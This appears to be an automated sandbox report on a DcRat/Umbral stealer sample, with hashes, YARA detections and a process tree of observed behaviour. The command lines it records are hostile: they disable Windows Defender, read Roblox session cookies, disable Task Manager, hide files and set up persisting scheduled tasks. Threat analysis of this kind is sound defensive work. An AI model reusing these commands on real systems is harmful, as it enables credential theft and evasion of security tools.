Analysis
max time kernel: 149s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20240419-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04-05-2024 01:35
Static task: static1
Behavioral task: behavioral1
Sample: a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
Resource: win7-20240221-en
General
Target: a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
Size: 4.3MB
MD5: 898a94f29edc228ce3bd2054f3d5d6dd
SHA1: f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5
SHA256: a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37
SHA512: 8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae
SSDEEP: 49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ
Malware Config
Signatures
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

Detect Umbral payload (3 IoCs)
resource | yara_rule
behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp | family_umbral
behavioral2/files/0x000c000000023b5b-5.dat | family_umbral
behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp | family_umbral

Process spawned unexpected child process (18 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1156 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4792 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1544 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3376 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2092 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 224 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2908 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3008 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1980 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 772 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2412 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3316 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2420 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2368 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5000 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3860 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2392 | 3464 | schtasks.exe | 91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5068 | 3464 | schtasks.exe | 91

resource | yara_rule
behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp | dcrat
behavioral2/files/0x000a000000023bb7-66.dat | dcrat
behavioral2/files/0x000a000000023bba-223.dat | dcrat
behavioral2/memory/624-225-0x0000000000EC0000-0x000000000110A000-memory.dmp | dcrat
Detects executables attempting to enumerate video devices using WMI (3 IoCs)
resource | yara_rule
behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice
behavioral2/files/0x000c000000023b5b-5.dat | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice
behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice

Detects executables containing possible sandbox analysis VM names (3 IoCs)
resource | yara_rule
behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxComputerNames
behavioral2/files/0x000c000000023b5b-5.dat | INDICATOR_SUSPICIOUS_EXE_SandboxComputerNames
behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxComputerNames

Detects executables containing possible sandbox analysis VM usernames (3 IoCs)
resource | yara_rule
behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxUserNames
behavioral2/files/0x000c000000023b5b-5.dat | INDICATOR_SUSPICIOUS_EXE_SandboxUserNames
behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxUserNames

Detects executables containing possible sandbox system UUIDs (3 IoCs)
resource | yara_rule
behavioral2/memory/2904-0-0x0000000000400000-0x000000000084E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxSystemUUIDs
behavioral2/files/0x000c000000023b5b-5.dat | INDICATOR_SUSPICIOUS_EXE_SandboxSystemUUIDs
behavioral2/memory/4440-65-0x000002423EB90000-0x000002423EBD0000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SandboxSystemUUIDs

Detects executables packed with SmartAssembly (3 IoCs)
resource | yara_rule
behavioral2/memory/624-232-0x000000001C2D0000-0x000000001C2DC000-memory.dmp | INDICATOR_EXE_Packed_SmartAssembly
behavioral2/memory/624-237-0x000000001C520000-0x000000001C52A000-memory.dmp | INDICATOR_EXE_Packed_SmartAssembly
behavioral2/memory/624-234-0x000000001C3E0000-0x000000001C3EA000-memory.dmp | INDICATOR_EXE_Packed_SmartAssembly
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
468 | powershell.exe

Disables Task Manager via registry modification

Drops file in Drivers directory (1 IoC)
description | ioc | Process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | stealer.exe

Checks computer location settings (2 TTPs, 5 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation | чекер dc.exe
Key value queried | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation | driverBrokercommon.exe
Key value queried | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation | csrss.exe
Key value queried | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation | a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

Executes dropped EXE (5 IoCs)
pid | Process
4440 | stealer.exe
4468 | чекер dc.exe
2808 | Inject.exe
624 | driverBrokercommon.exe
4688 | csrss.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow | ioc
22 | discord.com
23 | discord.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
16 | ip-api.com

Drops file in Program Files directory (2 IoCs)
description | ioc | Process
File created | C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe | driverBrokercommon.exe
File created | C:\Program Files (x86)\Common Files\Adobe\Acrobat\088424020bedd6 | driverBrokercommon.exe

Drops file in Windows directory (2 IoCs)
description | ioc | Process
File created | C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe | driverBrokercommon.exe
File created | C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\38384e6a620884 | driverBrokercommon.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 18 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1156 | schtasks.exe
1544 | schtasks.exe
3008 | schtasks.exe
2420 | schtasks.exe
2392 | schtasks.exe
5068 | schtasks.exe
4792 | schtasks.exe
2908 | schtasks.exe
3376 | schtasks.exe
224 | schtasks.exe
772 | schtasks.exe
3316 | schtasks.exe
5000 | schtasks.exe
3860 | schtasks.exe
2092 | schtasks.exe
1980 | schtasks.exe
2412 | schtasks.exe
2368 | schtasks.exe

Detects videocard installed (1 TTP, 1 IoC)
Uses WMIC.exe to determine videocard installed.
pid | Process
3916 | wmic.exe

Modifies registry class (4 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings | чекер dc.exe
Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings | driverBrokercommon.exe
Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings | csrss.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

Modifies registry key (1 TTP, 1 IoC)
pid | Process
4744 | reg.exe

Runs ping.exe (1 TTP, 1 IoC)
pid | Process
3288 | PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
pid | Process
4688 | csrss.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (54 IoCs)
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTP, 1 IoC)
pid | Process
1324 | attrib.exe
Processes
Process tree (bracketed number is the depth in the tree; each node lists its image path, PID, command line and the signatures it triggered):

[1] C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe (PID 2904)
    Command line: "C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\stealer.exe (PID 4440)
      Command line: "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\Wbem\wmic.exe (PID 1380)
        Command line: "wmic.exe" csproduct get uuid
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SYSTEM32\attrib.exe (PID 1324)
        Command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
        - Views/modifies file attributes

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 468)
        Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5108)
        Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4592)
        Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3116)
        Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\Wbem\wmic.exe (PID 3480)
        Command line: "wmic.exe" os get Caption
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\Wbem\wmic.exe (PID 4824)
        Command line: "wmic.exe" computersystem get totalphysicalmemory

    [3] C:\Windows\System32\Wbem\wmic.exe (PID 4124)
        Command line: "wmic.exe" csproduct get uuid

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3404)
        Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        - Suspicious behavior: EnumeratesProcesses

    [3] C:\Windows\System32\Wbem\wmic.exe (PID 3916)
        Command line: "wmic" path win32_VideoController get name
        - Detects videocard installed

    [3] C:\Windows\SYSTEM32\cmd.exe (PID 2940)
        Command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\PING.EXE (PID 3288)
          Command line: ping localhost
          - Runs ping.exe

  [2] C:\Users\Admin\AppData\Local\Temp\чекер dc.exe (PID 4468)
      Command line: "C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Modifies registry class
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\WScript.exe (PID 4532)
        Command line: "C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe (PID 4900)
          Command line: C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
          - Suspicious use of WriteProcessMemory

        [5] C:\MsWinsessiondllNet\driverBrokercommon.exe (PID 624)
            Command line: "C:\MsWinsessiondllNet\driverBrokercommon.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - Drops file in Program Files directory
            - Drops file in Windows directory
            - Modifies registry class
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\System32\cmd.exe (PID 3252)
              Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zv5EjZvQwa.bat"
              - Suspicious use of WriteProcessMemory

            [7] C:\Windows\system32\w32tm.exe (PID 3080)
                Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

            [7] C:\MsWinsessiondllNet\csrss.exe (PID 4688)
                Command line: "C:\MsWinsessiondllNet\csrss.exe"
                - Checks computer location settings
                - Executes dropped EXE
                - Modifies registry class
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious behavior: GetForegroundWindowSpam
                - Suspicious use of WriteProcessMemory

              [8] C:\Windows\System32\WScript.exe (PID 1956)
                  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fce6a35-a5d7-4e31-8567-7bee8400eb5e.vbs"

              [8] C:\Windows\System32\WScript.exe (PID 2996)
                  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9802ccd6-4030-46fb-b238-ffcfa505b77a.vbs"

        [5] C:\Windows\SysWOW64\reg.exe (PID 4744)
            Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            - Modifies registry key

  [2] C:\Users\Admin\AppData\Local\Temp\Inject.exe (PID 2808)
      Command line: "C:\Users\Admin\AppData\Local\Temp\Inject.exe"
      - Executes dropped EXE

[1] C:\Windows\system32\schtasks.exe (PID 1156)
    Command line: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Links\System.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 4792)
    Command line: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 1544)
    Command line: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Links\System.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 3376)
    Command line: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2092)
    Command line: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 224)
    Command line: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2908)
    Command line: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 3008)
    Command line: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 1980)
    Command line: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 772)
    Command line: schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2412)
    Command line: schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 3316)
    Command line: schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\MsWinsessiondllNet\unsecapp.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2420)
    Command line: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2368)
    Command line: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 5000)
    Command line: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\Acrobat\conhost.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 3860)
    Command line: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 2392)
    Command line: schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)

[1] C:\Windows\system32\schtasks.exe (PID 5068)
    Command line: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Windows\SystemResources\Windows.UI.ShellCommonInetCore\SearchApp.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
Network
MITRE ATT&CK Enterprise v15
Downloads